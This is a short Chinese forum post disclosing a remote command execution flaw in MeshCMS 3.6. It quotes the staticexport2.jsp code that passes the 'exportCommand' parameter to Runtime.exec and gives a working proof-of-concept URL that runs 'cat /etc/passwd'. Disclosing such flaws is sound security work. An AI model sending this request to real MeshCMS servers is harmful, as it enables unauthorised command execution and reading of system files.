请选择 进入手机版 | 继续访问电脑版
查看: 983|回复: 0

MeshCMS 3.6远程命令执行漏洞

[复制链接]
  • TA的每日心情

    2020-9-23 11:29
  • 签到天数: 903 天

    [LV.10]以坛为家III

    发表于 2016-4-7 10:16:30 | 显示全部楼层 |阅读模式
    version 3.6

    漏洞描述:
    文件 staticexport2.jsp jsp的一个函数“exportCommand” 可以造成命令执行

    [Java] 纯文本查看 复制代码
    if (!exportCommand.equals("")) {
     
          out.println("\nexecuting: " + exportCommand);
     
          Process process = Runtime.getRuntime().exec(exportCommand);
     
          out.println("standard output:");
     
          ByteArrayOutputStream baos = new ByteArrayOutputStream();
     
          Utils.copyStream(process.getInputStream(), baos, false);
     
          out.write(Utils.encodeHTML(baos.toString()));
     
          baos.reset();
     
          out.println("end of standard output\nerror output:");
     
          Utils.copyStream(process.getErrorStream(), baos, false);
     
          out.write(Utils.encodeHTML(baos.toString()));
     
          int exit = process.waitFor();
     
    out.println("end of error output\nexecution finished with exit code " +
    exit);


    POC:

    [HTML] 纯文本查看 复制代码
    http://127.0.0.1:8080/meshcms/meshcms/admin/staticexport2.jsp?exportBaseURL=%2Fmeshcms%2Fadmin%2Fstaticexport1.jsp&exportDir=upload&exportCheckDates=true&exportCommand=cat+%2Fetc%2Fpasswd&exportSaveConfig=true
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表